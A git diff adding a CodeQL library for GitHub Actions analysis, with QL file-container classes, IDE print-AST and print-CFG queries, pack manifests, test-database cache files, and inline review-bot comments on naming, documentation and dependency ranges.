+ */ + string getExtension() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(\\.([^.]*))?", 3) + } + + /** Gets the file in this container that has the given `baseName`, if any. */ + File getFile(string baseName) { + result = this.getAFile() and + result.getBaseName() = baseName + } + + /** Gets the sub-folder in this container that has the given `baseName`, if any. */ + Folder getFolder(string baseName) { + result = this.getAFolder() and + result.getBaseName() = baseName + } + + /** Gets the parent container of this file or folder, if any. */ + Container getParentContainer() { containerparent(result, this) } + + /** + * Gets the relative path of this file or folder from the root folder of the + * analyzed source location. The relative path of the root folder itself is + * the empty string. + * + * This has no result if the container is outside the source root, that is, + * if the root folder is not a reflexive, transitive parent of this container. + */ + string getRelativePath() { + exists(string absPath, string pref | + absPath = this.getAbsolutePath() and sourceLocationPrefix(pref) + | + absPath = pref and result = "" + or + absPath = pref.regexpReplaceAll("/$", "") + "/" + result and + not result.matches("/%") + ) + } + + /** + * Gets the stem of this container, that is, the prefix of its base name up to + * (but not including) the last dot character if there is one, or the entire + * base name if there is not. + * + * Here are some examples of absolute paths and the corresponding stems + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathStem
"/tmp/tst.go""tst"
"/tmp/.classpath"""
"/bin/bash""bash"
"/tmp/tst2.""tst2"
"/tmp/x.tar.gz""x.tar"
+ */ + string getStem() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(?:\\.([^.]*))?", 1) + } + + /** + * Gets a URL representing the location of this container. + * + * For more information see https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/#providing-urls. + */ + abstract string getURL(); + + /** + * Gets a textual representation of the path of this container. + * + * This is the absolute path of the container. + */ + string toString() { result = this.getAbsolutePath() } +} + +/** A folder. */ +class Folder extends Container, @folder { + override string getAbsolutePath() { folders(this, result) } + + /** Gets the URL of this folder. */ + override string getURL() { result = "folder://" + this.getAbsolutePath() } +} + +/** A file. */ +class File extends Container, @file { + override string getAbsolutePath() { files(this, result) } + + /** Gets the URL of this file. */ + override string getURL() { result = "file://" + this.getAbsolutePath() + ":0:0:0:0" } + + /** Holds if this file was extracted from ordinary source code. */ + predicate fromSource() { any() } +} diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml new file mode 100644 index 00000000000..df2fe6e3734 --- /dev/null +++ b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml 
@@ -0,0 +1,39 @@ +--- +sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +inProgress: + primaryLanguage: yaml + installedExtractors: + go: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go + python: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python + java: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java + html: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html + xml: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml + properties: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties + cpp: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp + swift: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift + csv: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv + yaml: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml + csharp: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp + javascript: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript + ruby: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby +creationMetadata: + cliVersion: 2.16.0 + creationTime: 2024-02-02T10:02:02.082819Z +finalised: false diff --git a/ql/lib/ide-contextual-queries/printAst.ql b/ql/lib/ide-contextual-queries/printAst.ql new file mode 100644 index 00000000000..9effce3721f --- /dev/null +++ b/ql/lib/ide-contextual-queries/printAst.ql 
@@ -0,0 +1,29 @@
+/**
+ * @name Print AST
+ * @description Produces a representation of a file's Abstract Syntax Tree.
+ * This query is used by the VS Code extension.
+ * @id actions/print-ast
+ * @kind graph
+ * @tags ide-contextual-queries/print-ast
+ */
+
+private import codeql.actions.ideContextual.IDEContextual
+import codeql.actions.ideContextual.printAst
+private import codeql.actions.Ast
+
+/**
+ * The source file to generate an AST from.
+ */
+external string selectedSourceFile();
+
+/**
+ * A configuration that only prints nodes in the selected source file.
+ */
+class Cfg extends PrintAstConfiguration {
+ override predicate shouldPrintNode(PrintAstNode n) {
+ super.shouldPrintNode(n) and
+ n instanceof PrintRegularAstNode and
+ n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile())
+ }
+}
+
diff --git a/ql/lib/ide-contextual-queries/printCfg.ql b/ql/lib/ide-contextual-queries/printCfg.ql
new file mode 100644
index 00000000000..d4a90f87f92
--- /dev/null
+++ b/ql/lib/ide-contextual-queries/printCfg.ql
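Review bot: The configuration class in printAst.ql is named `Cfg`, which reads as a control-flow-graph type and matches the `Cfg` alias that DataFlowPublic.qll in this commit gives to `codeql.actions.Cfg`. A name that says what it selects avoids the confusion, for example `class SelectedFileConfiguration extends PrintAstConfiguration {`. The QLDoc on `selectedSourceFile()` should also start with "Gets", as the matching comment in printCfg.ql does: `Gets the source file to generate an AST from.`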
@@ -0,0 +1,53 @@
+/**
+ * @name Print CFG
+ * @description Produces a representation of a file's Control Flow Graph.
+ * This query is used by the VS Code extension.
+ * @id actions/print-cfg
+ * @kind graph
+ * @tags ide-contextual-queries/print-cfg
+ */
+
+ private import codeql.actions.Cfg
+ private import codeql.actions.Cfg::TestOutput
+ private import codeql.actions.ideContextual.IDEContextual
+ private import codeql.Locations
+
+ /**
+ * Gets the source file to generate a CFG from.
+ */
+ external string selectedSourceFile();
+
+ external string selectedSourceLine();
+
+ external string selectedSourceColumn();
+
+ bindingset[file, line, column]
+ private CfgScope smallestEnclosingScope(File file, int line, int column) {
+ result =
+ min(Location loc, CfgScope scope |
+ loc = scope.getLocation() and
+ (
+ loc.getStartLine() < line
+ or
+ loc.getStartLine() = line and loc.getStartColumn() <= column
+ ) and
+ (
+ loc.getEndLine() > line
+ or
+ loc.getEndLine() = line and loc.getEndColumn() >= column
+ ) and
+ loc.getFile() = file
+ |
+ scope
+ order by
+ loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn()
+ )
+ }
+
+ class MyRelevantNode extends RelevantNode {
+ MyRelevantNode() {
+ this.getScope() =
+ smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()),
+ selectedSourceLine().toInt(), selectedSourceColumn().toInt())
+ }
+ }
diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo
new file mode 100644
index 00000000000..c77f7924c12
--- /dev/null
+++ b/ql/lib/qlpack.gbo
@@ -0,0 +1,13 @@
+---
+warnOnImplicitThis: false
+name: seclab/actions-all
+version: 0.0.1-dev
+groups: actions
+extractor: actions
+library: true
+tests: test
+dependencies:
+ codeql/javascript-all: ^0.8.7
+ "codeql/controlflow": "*"
+ "codeql/dataflow": "*"
+ "codeql/ssa": "*"
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
new file mode 100644
index 00000000000..325c63f4625
--- /dev/null
+++ b/ql/lib/qlpack.yml
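Review bot: `selectedSourceLine()` and `selectedSourceColumn()` in printCfg.ql have no QLDoc, and both are converted with `toInt()`, which has no result for a non-numeric string. In that case `MyRelevantNode` is simply empty and the query prints nothing, with no hint why. I would document them next to `selectedSourceFile()`, for example `/** Gets the selected line, as a decimal string. */` and `/** Gets the selected column, as a decimal string. */`. `MyRelevantNode` could also get a descriptive name such as `SelectedScopeNode`.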
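Review bot: `ql/lib/qlpack.gbo` appears to be a leftover copy of the pack manifest rather than a file the tooling reads. It declares a different pack name (`seclab/actions-all`), a different extractor (`actions`) and a dependency on `codeql/javascript-all`, none of which match the `qlpack.yml` added next to it in this commit. Keeping two contradictory manifests in the library root makes it unclear which dependency set is intended. I would drop the file from the commit and, if it is an editor backup, add `*.gbo` to the `.gitignore` introduced in the previous patch.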
@@ -0,0 +1,15 @@ +--- +library: true +warnOnImplicitThis: true +name: codeql/actions-all +version: 0.0.1-dev +dependencies: + codeql/controlflow: ^0.1.7 + codeql/yaml: '*' + codeql/util: '*' + codeql/dataflow: ^0.1.7 +dbscheme: yaml.dbscheme +extractor: yaml +tests: test +groups: + - yaml diff --git a/ql/lib/test-db/baseline-info.json b/ql/lib/test-db/baseline-info.json new file mode 100644 index 00000000000..9e26dfeeb6e --- /dev/null +++ b/ql/lib/test-db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/ql/lib/test-db/codeql-database.yml b/ql/lib/test-db/codeql-database.yml new file mode 100644 index 00000000000..887a8daf4c1 --- /dev/null +++ b/ql/lib/test-db/codeql-database.yml @@ -0,0 +1,10 @@ +--- +sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +creationMetadata: + cliVersion: 2.16.1 + creationTime: 2024-02-03T09:17:54.858204Z +finalised: true diff --git a/ql/lib/test-db/db-yaml/default/cache/.lock b/ql/lib/test-db/db-yaml/default/cache/.lock new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 
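Review bot: In `qlpack.yml`, `codeql/yaml` and `codeql/util` are declared with `'*'` while `codeql/controlflow` and `codeql/dataflow` use caret ranges, so the manifest does not bound the major version of two of its four dependencies. The commit's file list includes `ql/lib/codeql-pack.lock.yml`, which presumably pins what resolves today, but any re-resolution may pick an arbitrary published version of those two packs. Consider bounded ranges taken from the lock file, `codeql/yaml: ^<locked version>` and `codeql/util: ^<locked version>`.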
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info new file mode 100644 index 0000000000000000000000000000000000000000..9c1ea6cdeb296b714876d0e928d9978e9ec788c9 GIT binary patch literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 
z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..d14fdc5df9e27d6e8465f5feee0cd63125b6c0c2 GIT binary patch literal 28 TcmZQz00Slng&^}g^^O4m1iu0A literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|2mmC@0$~6E literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet new file mode 100644 index 0000000000000000000000000000000000000000..36cf33f33935c54f9618dc388940689272213cda GIT binary patch literal 1080 zcmXxi*GdFI5Jus_9QVe&=A3iRIUpj6h=^CBh>D1q5TDjZ**aM^@zLMv$($bW?8z>8ejR&VzKt+O~gY#eUbW`5k&Xb&2lLO}bC>KlJzO zQazws^pNH~=pWIodQ9_P)W3cn`AM}iV)a(=MpEdi0U-Z0w)$AMfH@&FeHTy{YLoe%3&Aw9q)~otQ zv(MCj^?G`eE%Md)Ir4E1s71a_9r?C&ZIP&f4$j7;%9{Kil*mxi15x7yt;i0bu|D literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion new file mode 100644 index 0000000000000000000000000000000000000000..5d863c8ae718a6bd8aef9eef33ef17233531c555 GIT binary patch literal 16 RcmZQz00Tx4DWv-TKL7)*0w(|f literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# new file mode 100644 index 0000000000000000000000000000000000000000..7dd70cb6a64b2f37bd6f247f4d864537e7f581e0 GIT binary patch literal 12 RcmZQzU|>*mxi15x7yt;i0bu|D literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType new file mode 100644 index 0000000000000000000000000000000000000000..4af95d3c402dcba274e92d90fdb3f7e2d597fba3 GIT binary patch literal 16 RcmZQz00R~fndC2B0009|0YLx& literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# new file mode 100644 index 0000000000000000000000000000000000000000..7dd70cb6a64b2f37bd6f247f4d864537e7f581e0 GIT binary patch literal 12 RcmZQzU|>*mxi15x7yt;i0bu|D literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b new file mode 100644 index 0000000000000000000000000000000000000000..0568018ed74c949f310f17fb02a0573c00e14341 GIT binary patch literal 24 VcmZQzU|`T#C*B35K!6d7nE)F40ek=e literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# new file mode 100644 index 0000000000000000000000000000000000000000..e8c2776988be612482d812854baff56fedb77aa3 GIT binary patch literal 12 ScmZQzU|`tc+qVozF#`Y&d;&cH literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode new file mode 100644 index 0000000000000000000000000000000000000000..fc01906a5647d1f63d470cf694f227834276a303 GIT binary patch literal 16 RcmZQz00UP%^Efv*!;p~iv|8*^N-aLD)tow literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/pages/01.pack b/ql/lib/test-db/db-yaml/default/cache/pages/01.pack new file mode 100644 index 0000000000000000000000000000000000000000..ca34f99698cba0c2120236f6cecc630c9021dd71 GIT binary patch literal 118 zcmWF)GhyW2Y{JOEAj?oBmcal4|Nj5~Zwh5IFc=tGq!}gWW*V1d8YLPQmS!3znx>lM 